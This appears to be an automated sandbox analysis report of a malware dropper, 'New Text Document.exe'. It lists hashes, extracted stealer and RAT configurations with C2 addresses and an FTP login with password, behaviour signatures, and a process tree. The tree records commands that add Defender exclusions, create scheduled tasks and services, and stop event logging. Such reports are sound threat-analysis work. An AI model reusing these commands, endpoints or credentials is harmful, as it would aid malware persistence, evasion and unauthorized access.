Resubmissions
09-04-2024 13:27
240409-qqa5hsbd5t 1009-04-2024 13:27
240409-qp978abd5s 1009-04-2024 13:27
240409-qp9lpabd4y 1009-04-2024 13:27
240409-qp9axsgb32 1018-11-2023 14:44
231118-r4d9rsef94 10Analysis
-
max time kernel
599s -
max time network
599s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
09-04-2024 13:27
General
-
Target
New Text Document.exe
-
Size
4KB
-
MD5
a239a27c2169af388d4f5be6b52f272c
-
SHA1
0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
-
SHA256
98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
-
SHA512
f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
-
SSDEEP
48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt
Malware Config
Extracted
redline
6077866846
https://pastebin.com/raw/KE5Mft0T
Extracted
stealc
http://52.143.157.84
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
94.156.8.213:58002
-
Install_directory
%Public%
-
install_file
svchost.exe
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.siscop.com.co - Port:
21 - Username:
[email protected] - Password:
+5s48Ia2&-(t
Extracted
redline
50502
2.58.56.216:38382
Extracted
redline
@OLEH_PSP
185.172.128.33:8970
Extracted
asyncrat
0.5.7B
Default
194.147.140.157:3361
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
msdtc.exe
-
install_folder
%AppData%
Extracted
lumma
https://appliedgrandyjuiw.shop/api
https://birdpenallitysydw.shop/api
https://cinemaclinicttanwk.shop/api
https://disagreemenywyws.shop/api
https://speedparticipatewo.shop/api
https://fixturewordbakewos.shop/api
https://colorprioritytubbew.shop/api
https://abuselinenaidwjuew.shop/api
https://methodgreenglassdatw.shop/api
https://affordcharmcropwo.shop/api
https://cleartotalfisherwo.shop/api
https://worryfillvolcawoi.shop/api
https://enthusiasimtitleow.shop/api
https://dismissalcylinderhostw.shop/api
https://diskretainvigorousiw.shop/api
https://communicationgenerwo.shop/api
https://pillowbrocccolipe.shop/api
Extracted
socks5systemz
http://booyojd.com/search/?q=67e28dd86c09f220490efa1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ae8889b5e4fa9281ae978fe71ea771795af8e05c645db22f31dfe339426fa11af66c152adb719a9577e55b8603e983a608ffd17c7ee93983e
http://booyojd.com/search/?q=67e28dd86c09f220490efa1c7c27d78406abdd88be4b12eab517aa5c96bd86ec94824d895a8bbc896c58e713bc90c91f36b5281fc235a925ed3e5dd6bd974a95129070b616e96cc92be510b866db52b2e34aec4c2b14a82966836f23d7f210c7ee979c3ccc699413
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
DcRat 63 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Detect Xworm Payload 4 IoCs
-
Detect ZGRat V1 5 IoCs
-
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
Process spawned unexpected child process 51 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 8 IoCs
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Stealc
Stealc is an infostealer written in C++.
-
UAC bypass 3 TTPs 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
ZGRat
ZGRat is remote access trojan written in C#.
-
DCRat payload 2 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
Renames multiple (122) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 2 IoCs
-
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 4 IoCs
-
Stops running service(s) 3 TTPs
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 29 IoCs
Looks up country code configured in the registry, likely geofence.
-
Drops startup file 11 IoCs
-
Executes dropped EXE 64 IoCs
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 9 IoCs
-
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 4 IoCs
Detects Themida, an advanced Windows software protection system.
-
UPX packed file 1 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Enumerates connected drives 3 TTPs 6 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 22 IoCs
-
Drops file in Program Files directory 12 IoCs
-
Drops file in Windows directory 12 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Detects Pyinstaller 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 31 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 62 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 6 IoCs
-
Modifies data under HKEY_USERS 54 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 1 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mCFVRlYL.exe"C:\Users\Admin\AppData\Local\Temp\mCFVRlYL.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\a\1234.exe"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\u3wc.0.exe"C:\Users\Admin\AppData\Local\Temp\u3wc.0.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\u3wc.1.exe"C:\Users\Admin\AppData\Local\Temp\u3wc.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 4323⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\test2.exe"C:\Users\Admin\AppData\Local\Temp\a\test2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup2.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"C:\Users\Admin\AppData\Local\Temp\a\Tester.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Public\svchost.exe"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\555.exe"C:\Users\Admin\AppData\Local\Temp\a\555.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC071.tmp"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Document.exe"C:\Users\Admin\AppData\Local\Temp\a\Document.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"' & exit4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "msdtc" /tr '"C:\Users\Admin\AppData\Roaming\msdtc.exe"'5⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD67A.tmp.bat""4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\gYVTyaODtj.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gYVTyaODtj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3A35.tmp"6⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\msdtc.exe"C:\Users\Admin\AppData\Roaming\msdtc.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BrawlB0t.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 7003⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"C:\Users\Admin\AppData\Local\Temp\a\securitycheck.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"C:\Users\Admin\AppData\Local\Temp\a\PrintSpoofer.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"C:\Users\Admin\AppData\Local\Temp\a\Adobe_update.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 8203⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"C:\Users\Admin\AppData\Local\Temp\a\Retailer_prog.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"C:\Users\Admin\AppData\Local\Temp\a\BroomSetup.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD13⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵
-
C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 436 -s 10163⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\a\Ledger-Live.exe3⤵
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30004⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\a\1111.exe"C:\Users\Admin\AppData\Local\Temp\a\1111.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 2043⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\new1.exe"C:\Users\Admin\AppData\Local\Temp\a\new1.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup5.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u4ic.0.exe"C:\Users\Admin\AppData\Local\Temp\u4ic.0.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6068 -s 12964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u4ic.1.exe"C:\Users\Admin\AppData\Local\Temp\u4ic.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 15323⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 7963⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\june.exe"C:\Users\Admin\AppData\Local\Temp\a\june.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-F481I.tmp\june.tmp"C:\Users\Admin\AppData\Local\Temp\is-F481I.tmp\june.tmp" /SL5="$60280,4053053,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 8243⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\new.exe"C:\Users\Admin\AppData\Local\Temp\a\new.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\a\123p.exe"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "OBGPQMHF"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"3⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "4⤵
-
C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\BlockComponentwebMonitordhcp\explorer.exe"C:\BlockComponentwebMonitordhcp\explorer.exe"6⤵
- Suspicious use of AdjustPrivilegeToken
-
